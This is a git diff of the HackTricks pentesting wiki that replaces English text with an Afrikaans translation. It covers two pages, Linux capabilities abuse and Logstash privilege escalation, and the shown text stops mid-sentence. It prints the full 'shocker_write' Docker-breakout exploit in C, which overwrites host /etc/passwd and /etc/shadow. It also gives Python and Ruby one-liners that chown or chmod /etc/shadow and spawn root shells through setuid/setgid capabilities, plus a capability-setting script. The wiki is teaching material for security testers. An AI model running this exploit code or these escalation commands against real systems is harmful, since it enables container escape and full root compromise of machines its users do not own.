@@ -1122,182 +1077,172 @@ Then, **compile the following version of the shocker exploit** that will allow y #include // gcc shocker_write.c -o shocker_write -// ./shocker_write /etc/passwd passwd +// ./shocker_write /etc/passwd passwd struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; +unsigned int handle_bytes; +int handle_type; +unsigned char f_handle[8]; }; void die(const char * msg) { - perror(msg); - exit(errno); +perror(msg); +exit(errno); } void dump_handle(const struct my_file_handle * h) { - fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, - h -> handle_type); - for (int i = 0; i < h -> handle_bytes; ++i) { - fprintf(stderr, "0x%02x", h -> f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr, "\n"); - if (i < h -> handle_bytes - 1) - fprintf(stderr, ", "); - } - fprintf(stderr, "};\n"); -} +fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes, +h -> handle_type); +for (int i = 0; i < h -> handle_bytes; ++i) { +fprintf(stderr, "0x%02x", h -> f_handle[i]); +if ((i + 1) % 20 == 0) +fprintf(stderr, "\n"); +if (i < h -> handle_bytes - 1) +fprintf(stderr, ", "); +} +fprintf(stderr, "};\n"); +} int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR * dir = NULL; - struct dirent * de = NULL; - path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); - oh -> handle_type = 1; - oh -> handle_bytes = 8; - return 1; - } - ++path; - fprintf(stderr, "[*] Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) - die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found 
%s\n", de -> d_name); - if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); - ino = de -> d_ino; - break; - } - } - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, & ino, sizeof(ino)); - memcpy(outh.f_handle + 4, & i, sizeof(i)); - if ((i % (1 << 20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); - if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle( & outh); - return find_handle(bfd, path, & outh, oh); - } - } - } - closedir(dir); - close(fd); - return 0; +int fd; +uint32_t ino = 0; +struct my_file_handle outh = { +.handle_bytes = 8, +.handle_type = 1 +}; +DIR * dir = NULL; +struct dirent * de = NULL; +path = strchr(path, '/'); +// recursion stops if path has been resolved +if (!path) { +memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle)); +oh -> handle_type = 1; +oh -> handle_bytes = 8; +return 1; +} +++path; +fprintf(stderr, "[*] Resolving '%s'\n", path); +if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0) +die("[-] open_by_handle_at"); +if ((dir = fdopendir(fd)) == NULL) +die("[-] fdopendir"); +for (;;) { +de = readdir(dir); +if (!de) +break; +fprintf(stderr, "[*] Found %s\n", de -> d_name); +if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) { +fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino); +ino = de -> d_ino; +break; +} +} +fprintf(stderr, "[*] Brute forcing remaining 32bit. 
This can take a while...\n"); +if (de) { +for (uint32_t i = 0; i < 0xffffffff; ++i) { +outh.handle_bytes = 8; +outh.handle_type = 1; +memcpy(outh.f_handle, & ino, sizeof(ino)); +memcpy(outh.f_handle + 4, & i, sizeof(i)); +if ((i % (1 << 20)) == 0) +fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i); +if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) { +closedir(dir); +close(fd); +dump_handle( & outh); +return find_handle(bfd, path, & outh, oh); +} +} +} +closedir(dir); +close(fd); +return 0; } int main(int argc, char * argv[]) { - char buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = { - 0x02, - 0, - 0, - 0, - 0, - 0, - 0, - 0 - } - }; - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - read(0, buf, 1); - // get a FS reference from something mounted in from outside - if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) - die("[-] open"); - if (find_handle(fd1, argv[1], & root_h, & h) <= 0) - die("[-] Cannot find valid handle!"); - fprintf(stderr, "[!] 
Got a final handle!\n"); - dump_handle( & h); - if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) - die("[-] open_by_handle"); - char * line = NULL; - size_t len = 0; - FILE * fptr; - ssize_t read; - fptr = fopen(argv[2], "r"); - while ((read = getline( & line, & len, fptr)) != -1) { - write(fd2, line, read); - } - printf("Success!!\n"); - close(fd2); - close(fd1); - return 0; +char buf[0x1000]; +int fd1, fd2; +struct my_file_handle h; +struct my_file_handle root_h = { +.handle_bytes = 8, +.handle_type = 1, +.f_handle = { +0x02, +0, +0, +0, +0, +0, +0, +0 +} +}; +fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" +"[***] The tea from the 90's kicks your sekurity again. [***]\n" +"[***] If you have pending sec consulting, I'll happily [***]\n" +"[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); +read(0, buf, 1); +// get a FS reference from something mounted in from outside +if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0) +die("[-] open"); +if (find_handle(fd1, argv[1], & root_h, & h) <= 0) +die("[-] Cannot find valid handle!"); +fprintf(stderr, "[!] Got a final handle!\n"); +dump_handle( & h); +if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0) +die("[-] open_by_handle"); +char * line = NULL; +size_t len = 0; +FILE * fptr; +ssize_t read; +fptr = fopen(argv[2], "r"); +while ((read = getline( & line, & len, fptr)) != -1) { +write(fd2, line, read); +} +printf("Success!!\n"); +close(fd2); +close(fd1); +return 0; } ``` +Om die docker-container te ontsnap, kan jy die lêers `/etc/shadow` en `/etc/passwd` van die gasheer **aflaai**, 'n **nuwe gebruiker** daaraan **toevoeg**, en **`shocker_write`** gebruik om hulle te oorskryf. Daarna, **toegang** via **ssh**. -In order to scape the docker container you could **download** the files `/etc/shadow` and `/etc/passwd` from the host, **add** to them a **new user**, and use **`shocker_write`** to overwrite them. 
Then, **access** via **ssh**. - -**The code of this technique was copied from the laboratory of "Abusing DAC\_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com) +**Die kode van hierdie tegniek is gekopieer uit die laboratorium van "Abusing DAC\_OVERRIDE Capability" van** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com) ## CAP\_CHOWN -**This means that it's possible to change the ownership of any file.** +**Dit beteken dat dit moontlik is om die eienaarskap van enige lêer te verander.** -**Example with binary** - -Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges: +**Voorbeeld met binêre** +Stel dat die **`python`** binêre hierdie vermoë het, kan jy die **eienaar** van die **shadow**-lêer **verander**, die root wagwoord **verander**, en voorregte verhoog: ```bash python -c 'import os;os.chown("/etc/shadow",1000,1000)' ``` - -Or with the **`ruby`** binary having this capability: - +Of met die **`ruby`** binêre lêer wat hierdie vermoë het: ```bash ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")' ``` - ## CAP\_FOWNER -**This means that it's possible to change the permission of any file.** +**Dit beteken dat dit moontlik is om die toestemming van enige lêer te verander.** -**Example with binary** - -If python has this capability you can modify the permissions of the shadow file, **change root password**, and escalate privileges: +**Voorbeeld met binêre** +As python hierdie vermoë het, kan jy die toestemmings van die skadulêer wysig, **die root wagwoord verander**, en voorregte verhoog: ```bash python -c 'import os;os.chmod("/etc/shadow",0666) ``` - ### CAP\_SETUID -**This means that it's possible to set the effective user id of the created process.** +**Dit beteken dat dit moontlik is om die effektiewe gebruikers-ID van die geskepde proses te stel.** 
-**Example with binary** - -If python has this **capability**, you can very easily abuse it to escalate privileges to root: +**Voorbeeld met binêre** +As python hierdie **vermoë** het, kan jy dit baie maklik misbruik om voorregte na root te verhoog: ```python import os os.setuid(0) os.system("/bin/bash") ``` - -**Another way:** - +**Nog 'n manier:** ```python import os import prctl @@ -1306,17 +1251,15 @@ prctl.cap_effective.setuid = True os.setuid(0) os.system("/bin/bash") ``` - ## CAP\_SETGID -**This means that it's possible to set the effective group id of the created process.** +**Dit beteken dat dit moontlik is om die effektiewe groep-id van die geskep proses te stel.** -There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). +Daar is baie lêers wat jy kan oorskryf om voorregte te verhoog, [**jy kan idees hier kry**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges). -**Example with binary** - -In this case you should look for interesting files that a group can read because you can impersonate any group: +**Voorbeeld met binêre** +In hierdie geval moet jy soek na interessante lêers wat 'n groep kan lees omdat jy enige groep kan voorstel: ```bash #Find every file writable by a group find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null 
@@ -1325,30 +1268,25 @@ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null #Find every file readable by a group in /etc with a maxpath of 1 find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null ``` - -Once you have find a file you can abuse (via reading or writing) to escalate privileges you can **get a shell impersonating the interesting group** with: - +Sodra jy 'n lêer gevind het wat jy kan misbruik (deur te lees of te skryf) om voorregte te verhoog, kan jy **'n skulp impersonateer as die interessante groep** met: ```python import os os.setgid(42) os.system("/bin/bash") ``` - -In this case the group shadow was impersonated so you can read the file `/etc/shadow`: - +In hierdie geval is die groep shadow geïmpersonaliseer sodat jy die lêer `/etc/shadow` kan lees: ```bash cat /etc/shadow ``` - -If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket). +As **docker** geïnstalleer is, kan jy die **docker-groep** **impersonate** en dit misbruik om te kommunikeer met die [**docker-socket** en voorregte te verhoog](./#writable-docker-socket). ## CAP\_SETFCAP -**This means that it's possible to set capabilities on files and processes** +**Dit beteken dat dit moontlik is om voorregte op lêers en prosesse in te stel** -**Example with binary** +**Voorbeeld met binêre** -If python has this **capability**, you can very easily abuse it to escalate privileges to root: +As python hierdie **voorreg** het, kan jy dit baie maklik misbruik om voorregte na root te verhoog: {% code title="setcapability.py" %} ```python 
@@ -1371,24 +1309,21 @@ cap_t = libcap.cap_from_text(cap) status = libcap.cap_set_file(path,cap_t) if(status == 0): - print (cap + " was successfully added to " + path) +print (cap + " was successfully added to " + path) ``` {% endcode %} - ```bash python setcapability.py /usr/bin/python2.7 ``` - {% hint style="warning" %} -Note that if you set a new capability to the binary with CAP\_SETFCAP, you will lose this cap. +Let daarop dat as jy 'n nuwe vermoë aan die binêre lêer toeken met CAP\_SETFCAP, sal jy hierdie vermoë verloor. {% endhint %} -Once you have [SETUID capability](linux-capabilities.md#cap\_setuid) you can go to its section to see how to escalate privileges. +Sodra jy die [SETUID-vermoë](linux-capabilities.md#cap\_setuid) het, kan jy na sy afdeling gaan om te sien hoe om voorregte te verhoog. -**Example with environment (Docker breakout)** - -By default the capability **CAP\_SETFCAP is given to the proccess inside the container in Docker**. You can check that doing something like: +**Voorbeeld met omgewing (Docker-ontsnapping)** +Standaard word die vermoë **CAP\_SETFCAP aan die proses binne die houer in Docker gegee**. Jy kan dit nagaan deur iets soos die volgende te doen: ```bash cat /proc/`pidof bash`/status | grep Cap CapInh: 00000000a80425fb 
@@ -1396,14 +1331,12 @@ CapPrm: 00000000a80425fb CapEff: 00000000a80425fb CapBnd: 00000000a80425fb CapAmb: 0000000000000000 - -capsh --decode=00000000a80425fb + +capsh --decode=00000000a80425fb 0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap ``` - -This capability allow to **give any other capability to binaries**, so we could think about **escaping** from the container **abusing any of the other capability breakouts** mentioned in this page.\ -However, if you try to give for example the capabilities CAP\_SYS\_ADMIN and CAP\_SYS\_PTRACE to the gdb binary, you will find that you can give them, but the **binary won’t be able to execute after this**: - +Hierdie vermoë maak dit moontlik om **enige ander vermoë aan bineêre lêers te gee**, so ons kan dalk dink aan **ontsnapping** uit die houer deur misbruik te maak van enige van die ander vermoë-uitbrake wat op hierdie bladsy genoem word.\ +Maar as jy byvoorbeeld die vermoëns CAP\_SYS\_ADMIN en CAP\_SYS\_PTRACE aan die gdb-binêre lêer probeer gee, sal jy vind dat jy hulle kan gee, maar die **binêre lêer sal nie in staat wees om uitgevoer te word nie**: ```bash getcap /usr/bin/gdb /usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip 
@@ -1413,27 +1346,25 @@ setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb /usr/bin/gdb bash: /usr/bin/gdb: Operation not permitted ``` - -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Permitted: This is a **limiting superset for the effective capabilities** that the thread may assume. It is also a limiting superset for the capabilities that may be added to the inheri‐table set by a thread that **does not have the CAP\_SETPCAP** capability in its effective set._\ -It looks like the Permitted capabilities limit the ones that can be used.\ -However, Docker also grants the **CAP\_SETPCAP** by default, so you might be able to **set new capabilities inside the inheritables ones**.\ -However, in the documentation of this cap: _CAP\_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\ -It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP\_SYS\_ADMIN or CAP\_SYS\_PTRACE in the inherit set to escalate privileges**. +[Van die dokumentasie](https://man7.org/linux/man-pages/man7/capabilities.7.html): _Toegelaat: Dit is 'n **beperkende superset vir die effektiewe vermoëns** wat die draad mag aanneem. Dit is ook 'n beperkende superset vir die vermoëns wat deur 'n draad by die erflike stel gevoeg kan word as dit nie die CAP\_SETPCAP-vermoë in sy effektiewe stel het nie._\ +Dit lyk asof die Toegelate vermoëns diegene beperk wat gebruik kan word.\ +Maar Docker verleen ook standaard die **CAP\_SETPCAP**, so jy kan dalk **nuwe vermoëns binne die erflike vermoëns stel**.\ +Maar in die dokumentasie van hierdie vermoë: _CAP\_SETPCAP: \[…] **voeg enige vermoë van die oproepdraad se begrensingsstel by sy erflike stel**_.\ +Dit lyk asof ons slegs vermoëns van die begrensingsstel by die erflike stel kan voeg. 
Dit beteken dat **ons nie nuwe vermoë soos CAP\_SYS\_ADMIN of CAP\_SYS\_PTRACE in die erflike stel kan plaas om voorregte te verhoog nie**. ## CAP\_SYS\_RAWIO -[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. +[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) bied 'n aantal sensitiewe verrigtinge, insluitend toegang tot `/dev/mem`, `/dev/kmem` of `/proc/kcore`, wysiging van `mmap_min_addr`, toegang tot `ioperm(2)` en `iopl(2)` stelseloproepe, en verskeie skyfopdragte. Die `FIBMAP ioctl(2)` is ook geaktiveer deur hierdie vermoë, wat in die [verlede](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html) probleme veroorsaak het. Volgens die manblad maak dit ook die houer in staat om beskrywend `verskeie toestelspesifieke verrigtinge op ander toestelle uit te voer`. -This can be useful for **privilege escalation** and **Docker breakout.** +Dit kan nuttig wees vir **voorregverhoging** en **Docker-ontsnapping**. ## CAP\_KILL -**This means that it's possible to kill any process.** +**Dit beteken dat dit moontlik is om enige proses te beëindig.** -**Example with binary** - -Lets suppose the **`python`** binary has this capability. If you could **also modify some service or socket configuration** (or any configuration file related to a service) file, you could backdoor it, and then kill the process related to that service and wait for the new configuration file to be executed with your backdoor. 
+**Voorbeeld met binêre** +Laat ons aanneem dat die **`python`** binêre hierdie vermoë het. As jy **ook 'n diens- of soketkonfigurasie** (of enige konfigurasie-lêer wat verband hou met 'n diens) kon wysig, kon jy dit agterdeur maak en dan die proses wat verband hou met daardie diens doodmaak en wag vir die nuwe konfigurasie-lêer om met jou agterdeur uitgevoer te word. ```python #Use this python code to kill arbitrary processes import os @@ -1441,16 +1372,13 @@ import signal pgid = os.getpgid(341) os.killpg(pgid, signal.SIGKILL) ``` +**Privesc met kill** -**Privesc with kill** - -If you have kill capabilities and there is a **node program running as root** (or as a different user)you could probably **send** it the **signal SIGUSR1** and make it **open the node debugger** to where you can connect. - +As jy kill-vermoëns het en daar is 'n **node-program wat as root** (of as 'n ander gebruiker) loop, kan jy waarskynlik **die signaal SIGUSR1 stuur** en dit laat **die node-debugger oopmaak** waar jy kan koppel. ```bash kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` - {% content-ref url="electron-cef-chromium-debugger-abuse.md" %} [electron-cef-chromium-debugger-abuse.md](electron-cef-chromium-debugger-abuse.md) {% endcontent-ref %} @@ -1459,20 +1387,20 @@ kill -s SIGUSR1
-​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheid geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie en kuberveiligheid professionele in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## CAP\_NET\_BIND\_SERVICE -**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability. +**Dit beteken dat dit moontlik is om na enige poort te luister (selfs na bevoorregte poorte).** Jy kan nie voorregte direk verhoog met hierdie vermoë nie. -**Example with binary** +**Voorbeeld met binêre** -If **`python`** has this capability it will be able to listen on any port and even connect from it to any other port (some services require connections from specific privileges ports) +As **`python`** hierdie vermoë het, sal dit in staat wees om na enige poort te luister en selfs daarvandaan na enige ander poort te verbind (sommige dienste vereis verbindings vanaf spesifieke bevoorregte poorte) {% tabs %} -{% tab title="Listen" %} +{% tab title="Luister" %} ```python import socket s=socket.socket() @@ -1480,12 +1408,12 @@ s.bind(('0.0.0.0', 80)) s.listen(1) conn, addr = s.accept() while True: - output = connection.recv(1024).strip(); - print(output) +output = connection.recv(1024).strip(); +print(output) ``` {% endtab %} -{% tab title="Connect" %} +{% tab title="Verbind" %} ```python import socket s=socket.socket() 
@@ -1497,25 +1425,22 @@ s.connect(('10.10.10.10',500)) ## CAP\_NET\_RAW -[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) capability permits processes to **create RAW and PACKET sockets**, enabling them to generate and send arbitrary network packets. This can lead to security risks in containerized environments, such as packet spoofing, traffic injection, and bypassing network access controls. Malicious actors could exploit this to interfere with container routing or compromise host network security, especially without adequate firewall protections. Additionally, **CAP_NET_RAW** is crucial for privileged containers to support operations like ping via RAW ICMP requests. +[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html)-vermoë maak dit vir prosesse moontlik om **RAW- en PACKET-sokkels te skep**, wat hulle in staat stel om willekeurige netwerkpakkies te genereer en te stuur. Dit kan lei tot sekuriteitsrisiko's in gekonteneerde omgewings, soos pakketspoofing, verkeersinspuiting en omseil van netwerktoegangsbeheer. Kwaadwillige aktore kan dit uitbuit om te interfereer met gekonteneerde roeteverwerking of om die netwerksekuriteit van die gasheer in gevaar te stel, veral sonder voldoende firewallbeskerming. Daarbenewens is **CAP_NET_RAW** noodsaaklik vir bevoorregte gekonteneerde om operasies soos ping via RAW ICMP-versoeke te ondersteun. -**This means that it's possible to sniff traffic.** You cannot escalate privileges directly with this capability. +**Dit beteken dat dit moontlik is om verkeer af te luister.** Jy kan nie direk voorregte verhoog met hierdie vermoë nie. -**Example with binary** - -If the binary **`tcpdump`** has this capability you will be able to use it to capture network information. +**Voorbeeld met binêre lêer** +As die binêre lêer **`tcpdump`** hierdie vermoë het, sal jy dit kan gebruik om netwerkinligting vas te vang. 
```bash getcap -r / 2>/dev/null /usr/sbin/tcpdump = cap_net_raw+ep ``` +Let wel dat as die **omgewing** hierdie vermoë gee, jy ook **`tcpdump`** kan gebruik om verkeer te onderskep. -Note that if the **environment** is giving this capability you could also use **`tcpdump`** to sniff traffic. - -**Example with binary 2** - -The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" (**localhost**) interface. The code is from the lab "_The Basics: CAP-NET\_BIND + NET\_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com) +**Voorbeeld met binêre 2** +Die volgende voorbeeld is **`python2`** kode wat nuttig kan wees om verkeer van die "**lo**" (**localhost**) koppelvlak te onderskep. Die kode kom van die laboratorium "_The Basics: CAP-NET\_BIND + NET\_RAW_" van [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com) ```python import socket import struct @@ -1523,11 +1448,11 @@ import struct flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"] def getFlag(flag_value): - flag="" - for i in xrange(8,-1,-1): - if( flag_value & 1 <
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevent in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n broeiplek vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/logstash.md b/linux-hardening/privilege-escalation/logstash.md index 1489b6bde..2c0abcd4a 100644 --- a/linux-hardening/privilege-escalation/logstash.md +++ b/linux-hardening/privilege-escalation/logstash.md @@ -1,94 +1,86 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## Logstash -Logstash is used to **gather, transform, and dispatch logs** through a system known as **pipelines**. These pipelines are made up of **input**, **filter**, and **output** stages. An interesting aspect arises when Logstash operates on a compromised machine. +Logstash word gebruik om **logs te versamel, transformeer en versprei** deur 'n stelsel wat bekend staan as **pipelines**. Hierdie pipelines bestaan uit **invoer**, **filter** en **uitvoer** fases. 'n Interessante aspek ontstaan wanneer Logstash op 'n gekompromitteerde masjien werk. -### Pipeline Configuration - -Pipelines are configured in the file **/etc/logstash/pipelines.yml**, which lists the locations of the pipeline configurations: +### Pipeline-konfigurasie +Pipelines word gekonfigureer in die lêer **/etc/logstash/pipelines.yml**, wat die plekke van die pipeline-konfigurasies lys: ```yaml # Define your pipelines here. Multiple pipelines can be defined. # For details on multiple pipelines, refer to the documentation: # https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html - pipeline.id: main - path.config: "/etc/logstash/conf.d/*.conf" +path.config: "/etc/logstash/conf.d/*.conf" - pipeline.id: example - path.config: "/usr/share/logstash/pipeline/1*.conf" - pipeline.workers: 6 +path.config: "/usr/share/logstash/pipeline/1*.conf" +pipeline.workers: 6 ``` +Hierdie lêer onthul waar die **.conf** lêers, wat pyplynkonfigurasies bevat, geleë is. Wanneer 'n **Elasticsearch uitsetmodule** gebruik word, is dit algemeen dat **pyplyne** **Elasticsearch-legitimasie** insluit, wat dikwels uitgebreide voorregte het as gevolg van Logstash se behoefte om data na Elasticsearch te skryf. Wildcards in konfigurasiepaaie stel Logstash in staat om alle ooreenstemmende pyplyne in die aangewese gids uit te voer. -This file reveals where the **.conf** files, containing pipeline configurations, are located. 
When employing an **Elasticsearch output module**, it's common for **pipelines** to include **Elasticsearch credentials**, which often possess extensive privileges due to Logstash's need to write data to Elasticsearch. Wildcards in configuration paths allow Logstash to execute all matching pipelines in the designated directory. +### Voorregverhoging deur Skryfbare Pyplyne -### Privilege Escalation via Writable Pipelines +Om voorregverhoging te probeer, identifiseer eers die gebruiker waaronder die Logstash-diens gewoonlik loop, tipies die **logstash**-gebruiker. Maak seker dat jy aan **een** van hierdie kriteria voldoen: -To attempt privilege escalation, first identify the user under which the Logstash service is running, typically the **logstash** user. Ensure you meet **one** of these criteria: +- Besit **skryftoegang** tot 'n pyplyn **.conf** lêer **of** +- Die **/etc/logstash/pipelines.yml** lêer gebruik 'n wildcard, en jy kan na die teikengids skryf -- Possess **write access** to a pipeline **.conf** file **or** -- The **/etc/logstash/pipelines.yml** file uses a wildcard, and you can write to the target folder +Daarbenewens moet **een** van hierdie voorwaardes vervul word: -Additionally, **one** of these conditions must be fulfilled: - -- Capability to restart the Logstash service **or** -- The **/etc/logstash/logstash.yml** file has **config.reload.automatic: true** set - -Given a wildcard in the configuration, creating a file that matches this wildcard allows for command execution. For instance: +- Die vermoë om die Logstash-diens te herlaai **of** +- Die **/etc/logstash/logstash.yml** lêer het **config.reload.automatic: true** ingestel +Met 